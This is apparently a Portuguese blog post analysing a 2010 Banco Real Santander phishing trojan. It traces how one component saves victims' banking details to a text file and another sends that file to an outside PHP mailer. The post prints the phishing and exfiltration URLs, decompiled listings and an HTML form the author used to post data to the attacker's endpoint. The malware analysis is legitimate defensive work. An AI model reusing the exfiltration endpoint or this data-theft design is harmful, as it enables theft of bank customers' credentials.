Essa fraude tinha o objetivo de atingir os clientes do Banco Real Santander que utilizam o serviço de Internet Banking.

No dia 07/11/2010 recebi uma mensagem de spam phishing que continha os campos “De: atendimento@mail.real.com” e “Assunto: Atualização de Segurança Banco Real Santander.”.

Havia um link na mensagem que apontava para a URL:

http://www.danseavecnousbordeaux.com/includes/gal_079/medium/RealWebSecure/SecureWebReal.php?codcliente=72429

Ao clicar no link foi solicitado o download do arquivo:

Nome: Real-SecureWeb.exe (Trojan-Banker.Win32.Banker2.aew)

MD5: 2f0ece4c716a7be1d41d1b9803b27b05

O primeiro passo da análise foi identificar se o executável possuía algum tipo de compactador, isso pode ser feito utilizando o Exeinfo PE.

Como podemos ver, o arquivo Real-SecureWeb.exe foi compactado com o WinZip Sfx (Self-extracting). O módulo Sfx do WinZip permite descompactar arquivos automaticamente sem a necessidade de outros programas, o próprio executável carrega o módulo de descompactação.

Sendo assim possivelmente quando executado o Real-SecureWeb.exe deve descompactar outro(s) arquivo(s).

Para monitorar a execução do malware no sistema operacional, utilizei a ferramenta Process Monitor da Microsoft, anteriormente na Sysinternals.

Process Monitor é uma ferramenta de monitoramento para Windows que mostra em tempo real atividades de sistema, arquivos, registro, processos e threads. Com ela é possível criar filtros para exibir apenas determinados processos e obter muitas informações do que está acontecendo no ambiente.

Executei o Process Monitor, ativei a captura de todos os processos e executei o Real-SecureWeb.exe para descobrir suas interações com o sistema operacional.

O malware entrou em execução e apresentou três janelas:

Podemos ver que esse malware pretende capturar todas as informações possíveis das vítimas, até o Nome do Pai, Profissão e Empresa Atual.

Digitei informações fictícias em todas as telas e fui até o final, quando cliquei em “Confirmar” o malware exibiu uma mensagem de verificação dos dados e desapareceu.

Agora era hora de verificar os logs do Process Monitor para descobrir quais atividades ele executou no sistema operacional.

Foram gerados 1739 eventos relativos ao malware, o log com todos pode ser baixado aqui.

Analisarei apenas os principais eventos para entendermos o funcionamento do malware.

Conforme a imagem abaixo, vemos na janela do Process Monitor várias colunas:

Time of Day, Process Name, PID, Operation, Path, Result, Detail

Para facilitar a leitura listarei somente as colunas: Time of Day, Process Name e Operation. Path, Result e Detail serão exibidas quando necessárias.

Então vamos começar!

Através do Process Monitor conseguimos obter muitas informações importantes. Basicamente ao ser executado o malware descompacta dois arquivos, o primeiro, Real.exe, é responsável por coletar as informações que o usuário digita em suas telas e possivelmente salvar em um arquivo TXT e o segundo, Reals.exe, possivelmente deve enviar o TXT pela Internet.

Após realizar todas essas funções o malware tenta limpar seus rastros apagando os arquivos envolvidos na fraude, mas como vimos existem algumas falhas.

Em uma segunda execução do malware, antes que fossem apagados capturei os três arquivos criados: Real.exe, Reals.exe e identificando.txt.

Conforme foi constado nos logs capturados pelo Process Monitor, o arquivo Real-SecureWeb.exe descompactava e executava dois arquivos: Real.exe e Reals.exe.

E ainda, o arquivo Real.exe gerava um outro chamado indentificando.txt. Isso mesmo, INdentificando, só agora notei essa grafia errada que foi utizada para nomear o arquivo. Isso por sinal é uma constante nesse malware, palavras escritas erradas e expressões chulas.

Vejamos agora a análise de cada um desses três arquivos.

O primeiro passo é descobrir se o executável possuí algum compactador (packer), fiz isso utilizando o RDG Packer Detector.

Não foi encontrado nada, identificou a linguagem de programação Borland Delphi v6.0 ou v7.0. Outro detalhe interessante que o RDG apresentou corretamente foi a origem do malware.

Sabendo que é Delphi, podemos tentar a descompilação com o DeDe, que costuma apresentar bons resultados como por exemplo Forms, Units e Eventos recuperados.

Ao submeter o arquivo Real.exe ao DeDe foi identificado o nome do projeto “dragon”, também encontrou um Form chamado “dilma” (!), a Unit chamada “orion” e alguns nomes de componentes. Isso pode ser visto na imagem abaixo.

Sabemos que o Real.exe é responsável por apresentar as telas do malware onde as vítimas digitam os dados e também vimos no artigo anterior que ele cria o arquivo indentificando.txt através dessas diretivas:

03:10:45,1509465,"Real.exe","CreateFile","C:\indentificando.txt"

03:10:45,1523162,"Real.exe","WriteFile","C:\indentificando.txt" 03:10:45,1529191,"Real.exe","CloseFile","C:\indentificando.txt"

No código descompilado não foi possível encontrar esse caminho do arquivo indentificando.txt, isso porque a string está criptografada com uma função interna do malware, através do debug seria possível localizá-la.

Porém, no código há algumas pistas do que esse arquivo pode conter, no Form “dilma” existe um botão “Confirmar” que possui atríbuído ao evento OnClick uma procedure chamada “vaiClick”:

procedure Tdilma.vaiClick(Sender : Tobject);

Nessa procedure, dentre outras coisas, existe a captura de todos os dados que foram digitados nos campos do formulário (componentes TEdit) e ao final esses dados são atribuídos a um componente TMemo que foi nomeado de forma bem culta, “xupameupinto”.

Tdilma.xupameupinto : TMemo

O que se segue são sequências de funções que atribuem ao componente TMemo linhas que contêm um rótulo e a informação que a vítima digitou.

Reference to control Tdilma.xupameupinto : TMemo

Reference to field TMemo.Lines : Tstrings

Possible String Reference to: '********************************'

Reference to method Tstrings.Add(string)

Reference to method TStrings.Add(string)

Reference to control Tdilma.a3 : TEdit

Reference to: Controls.TControl.GetText(TControl):TCaption;

Possible String Reference to: 'AG..........:'

Reference to control Tdilma.xupameupinto : TMemo

Reference to field TMemo.Lines : TStrings

Reference to method TStrings.Add(string)

Reference to control Tdilma.a4 : TEdit

Reference to: Controls.TControl.GetText(TControl):TCaption;

Possible String Reference to: 'Cont........:'

Reference to control Tdilma.xupameupinto : TMemo

Reference to field TMemo.Lines : TStrings

Reference to method TStrings.Add(string)

Reference to control Tdilma.CC : TcomboBox

Reference to: Controls.TControl.GetText(TControl):TCaption;

Possible String Reference to: 'bandeira....:'

Essa sequência se repete para todos os campos Edits, até que no final é utilizado o método Tstrings.SaveToFile(string) e é passada como parâmetro uma string criptografada, que deve ser o caminho “C:\indentificando.txt”.

Possible String Reference to: 'GpfSQMvaPMvqQMPfOs5kP6ykT7Xq'

Reference to: System.@LStrToPChar(String):PAnsiChar;

Reference to method TStrings.SaveToFile(string)

Possible String Reference to: 'Obrigado por sua atenção o Banco Real Santander agradece.'

Ao analisar o arquivo indentificando.txt foi encontrado esse conteúdo:

A Imagem abaixo mostra isso:

O conteúdo corrobora o que foi encontrado nos códigos do Delphi no arquivo Real.exe.

A análise do nosso terceiro arquivo seguiu o mesmo esquema do anterior. Foi identificada a linguagem Delphi e depois feita a descompilação com o DeDe.

Dessa vez o projeto foi nomeado como “pugaaqui”, o Form “bobiodanco” e a Unit “unidosvaiser”.

Destaque para os nomes dos componentes e procedures da Unit:

carregasualma: TMemo;

tempobom: TTimer;

amuandomtu: TIdHTTP;

procedure goldeletra(Sender : TObject);

procedure tempobomTimer(Sender : TObject);

Vejamos o que a procedure tempobomTimer faz.

procedure Tbobiodanco.tempobomTimer(Sender : TObject);

begin

Possible String Reference to: 'C:\indentificando.txt'

Reference to: SysUtils.FileExists(AnsiString):Boolean;

Reference to control Tbobiodanco.carregasualma : TMemo

Reference to field TMemo.Lines : TStrings

Possible String Reference to: 'C:\indentificando.txt'

Reference to method TStrings.LoadFromFile(string)

Reference to bobiodanco

Reference to : Tbobiodanco.goldeletra()

end;

Basicamente lê o arquivo indentificando.txt, atribui seu conteúdo ao TMemo e chama a procedure goldeletra.

Vejamos a goldeletra agora.

procedure Tbobiodanco.goldeletra(Sender : TObject);

begin

***** TRY

Reference to class TStringList

Reference to: System.TObject.Create(TObject;Boolean);

Reference to bobiodanco

Reference to control Tbobiodanco.carregasualma : TMemo

Reference to field TMemo.Lines : TStrings

Reference to method TStrings.Put(Integer,string)

Reference to method TStringList.Add(string)

Reference to method TStringList.Add(string)

Reference to bobiodanco

Reference to: Controls.TControl.GetText(TControl):TCaption;

Reference to: System.@LStrCat3;

Reference to method TStringList.Add(string)

***** TRY

Reference to bobiodanco

Reference to bobiodanco

Reference to control Tbobiodanco.tempobom : TTimer

Reference to: ExtCtrls.TTimer.SetEnabled(TTimer;Boolean);

****** FINALLY

Reference to bobiodanco

Reference to control Tbobiodanco.amuandomtu : TIdHTTP

Reference to: System.TObject.Free(TObject);

Reference to: System.TObject.Free(TObject);

Possible String Reference to: 'C:\indentificando.txt'

Reference to: Grids.TInplaceEdit.Visible(TInplaceEdit):Boolean;

Reference to TApplication instance

Reference to: Forms.TApplication.Terminate(TApplication);

Reference to: System.@HandleFinally;

****** END

****** FINALLY

end;

Vemos aqui quanta informação útil o DeDe conseguiu recuperar através do processo de descompilação do executável.

Essa procedure goldeletra atribui dois endereços de e-mail para a variável “praque”, atribui um título qualquer para a variável “titul” e atribui o conteúdo do componente TMemo para a variável “text”.

Depois através de um componente de conexão HTTP se conecta ao endereço “http://esec.ru/upload/noro.php”. Por fim libera os componentes utilizados.

Então assim como constatei na análise da fraude do iToken Itaú, esse malware utiliza uma página PHP para enviar por e-mail para os fraudadores os dados furtados.

Para testar esse procedimento de envio de e-mail primeiro tentei passar o conteúdo das variáveis pela URL através do método GET digitando no navegador:

http://esec.ru/upload/noro.php?praque=rplmetal@ig.com.br&titul=assunto&text=qualquercoisa

Isso não funcionou, lembrei então que na fraude do iToken era utilizado o método POST de envio de variáveis, assim só poderia enviar as informações através de um formulário HTML.

Criei o formulário HTML com esse código:

<form name="form1" method="post" action="http://esec.ru/upload/noro.php">

Email: <input type="text" name="praque" size="40"><br><br>

Assunto: <input type="text" name="titul" size="40"><br><br>

Texto: <input type="text" name="text" size="40"><br><br>

<input type="submit">

</form>

E enviei com os campos preenchidos conforme a imagem abaixo:

Após clicar no botão Enviar fui conferir meu e-mail para ver se havia chegado a mensagem. Conforme o esperado isso realmente aconteceu:

Ao analisar as duas partes desse artigo nota-se que esse malware é bem direto e objetivo. Executa, solicita as informações, envia por e-mail e depois apaga tudo (tenta pelo menos). Não faz nenhuma modificação no computador além dessas.

O comportamento dele me lembrou do programa utilizado para enviar a declaração de Imposto de Renda. No sistema da Receita Federal utiliza-se um programa para preencher a declaração e salvar no computador e outro (ReceitaNet) para enviar pela Internet.

A mesma coisa acontece com esse golpe, em um programa preenche-se a “declaração” para o fraudador e é salva no computador e o outro envia a “declaração”.

Vimos que com o uso de variadas técnicas e ferramentas podemos obter valiosas informações sobre o comportamento dos malwares.

Comentários?

Comentário enriquecedor feito pelo Rodrigo Lima: